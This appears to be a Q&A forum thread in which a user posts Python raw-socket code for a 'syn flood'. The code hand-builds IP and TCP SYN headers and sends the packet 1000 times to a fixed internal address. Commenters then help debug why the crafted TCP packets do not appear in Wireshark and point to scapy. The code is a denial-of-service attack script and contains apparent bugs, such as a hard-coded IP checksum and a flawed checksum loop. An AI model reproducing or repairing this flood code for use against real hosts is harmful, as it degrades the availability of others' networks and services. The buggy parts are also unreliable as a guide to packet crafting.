# Syn Flood with python sockets

Tags: python, sockets, tcp

I'm trying for a syn flood program with python. I got the below code from http://www.binarytides.com/python-syn-flood-program-raw-sockets-linux/.

There are no packets in wireshark when i run this. But when i remove IP_HDRINCL line, i can see IPV4(protocol value= "ff") packets,but i want tcp(that's the reason why I chose include crafted ip header to set protocol =6)

```
import ctypes
import socket, sys
from struct import *

def checksum(msg):
    s = 0

    # loop taking 2 characters at a time
    for i in range(0, len(msg), 2):
        w = ord(msg[i]) + (ord(msg[i+1]) << 8 )
        s = s + w
        s = (s>>16) + (s & 0xffff);
        s = s + (s >> 16);
        #complement and mask to 4 byte short
        s = ~s & 0xffff
    return s
try:

    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) #RAW PACKET

except socket.error , msg:
    print 'Socket could not be created. Error Code : ' + str(msg[0]) + 'Message ' + msg[1]
    sys.exit()


source_ip = '172.26.102.111'
dest_ip = '172.22.2.48'


s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)  #INCLUDE HEADER

#Constructing the packet
packet = '';


#*******************IP HEADER********************
ip_ihl = 5
ip_ver = 4
ip_tos = 0
ip_tot_len = 48 
ip_id = 54321   
ip_frag_off = 0

ip_ttl = 128
ip_proto = 6
ip_check =  14840          #ca5f from http://www.n-cg.net/hec.htm
ip_saddr = socket.inet_aton ( source_ip )   
ip_daddr = socket.inet_aton ( dest_ip )

ip_ihl_ver = (ip_ver << 4) + ip_ihl



# the ! in the pack format string means network order
ip_header = pack('!BBHHHBBH4s4s' , ip_ihl_ver, ip_tos, ip_tot_len, ip_id, ip_frag_off, ip_ttl,   6    , ip_check, ip_saddr, ip_daddr)


#ip_check=checksum(ip_header)


ip_header = pack('!BBHHHBBH4s4s' , ip_ihl_ver, ip_tos, ip_tot_len, ip_id, ip_frag_off, ip_ttl,   6    , ip_check, ip_saddr, ip_daddr)

#**********************IP HEADER IS COMPLETEDE********************


# ********************* TCP HEADER********************
tcp_source = 1234   
tcp_dest = 8000   
tcp_seq = 524
tcp_ack_seq = 0
tcp_doff = 5    #tcp header 5 * 4 = 20 bytes
#tcp flags
tcp_fin = 0
tcp_syn = 1
tcp_rst = 0
tcp_psh = 0
tcp_ack = 0
tcp_urg = 0
tcp_window = socket.htons (8192)    #   maximum allowed window size
tcp_check = 0
tcp_urg_ptr = 0

tcp_offset_res = (tcp_doff << 4) + 0
tcp_flags = tcp_fin + (tcp_syn << 1) + (tcp_rst << 2) + (tcp_psh <<3) + (tcp_ack << 4) + (tcp_urg << 5)


tcp_header = pack('!HHLLBBHHH' , tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags,  tcp_window, tcp_check, tcp_urg_ptr)

data = 'GET /abc'

# pseudo header fields
source_address = socket.inet_aton( source_ip )
dest_address = socket.inet_aton(dest_ip)
placeholder = 0
protocol =6
tcp_length = len(tcp_header) + len(data)

psh = pack('!4s4sBBH' , source_address , dest_address , placeholder , 6 , tcp_length);
psh = psh + tcp_header + data;

tcp_check = checksum(psh)
print tcp_check,"before inducing checksum"
#print tcp_checksum

# make the tcp header again and fill the correct checksum - remember checksum is NOT in network byte order
tcp_header = pack('!HHLLBBH' , tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags,  tcp_window) + pack('H' , tcp_check) + pack('!H' , tcp_urg_ptr)
tcp_header=tcp_header
# final full packet - syn packets dont have any data
packet = ip_header+tcp_header

#Send the packet finally - the port specified has no effect
k=0
#s.connect((dest_ip,80))
while k<1000:
   s.sendto(packet,(dest_ip,80))
   k=k+1
   print k
```

Comment: I am not able to run your code because of an error at `s.sendto(packet,(dest_ip,80))`! Error is `socket.error: [Errno 10022] An invalid argument was supplied`. I am using python 2.7 on Win 7 machine.

Comment: I just tried it. Mine is 2.7.10 on win7. Can you please try it once again. I can see printing k values from 1-1000 after running the code. Thank you for your reply!

Comment: TCP is agnostic of the IP version used, did you mean you want to use IPv6 instead of IPv4?

Comment: I want to use Tcp in ipv4. But if i use SOCK_STREAM handshake is being done with s.connect. What i want is to craft syn packet in ipv4.

Comment: I got it running and I too see no packets generated in the wireshar. I tried to comment out `s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)`, but I still see no packets being generated.

Comment: I can see packets in wireshark if i commented HDRINCL line. But those packets included kernal generated ip packet. After ip packet i see manually crafted ip packet+ manually crafterd tcp header.

Comment: This is what i got in wireshark when i removed HDRINCL line, [link](http://s16.postimg.org/nztpyxzxx/without_hdrincl_line.png)  @ρss

Comment: I got the same results. I have used `unpack()` to check the final packet crafted by the python code. The packets looks fine as It has ip and TCP headers with the values specified in the code. But due to some reason the TCP header is not attached to the packet when it is sent out. In wireshark we can see this problem. Any reason why not to use scapy? http://www.secdev.org/projects/scapy/doc/usage.html#syn-scans

Comment: I haven't tried yet in scapy. I'll try with that. Incase if you find any solution/reason for the above problem, please let me know. Thank you!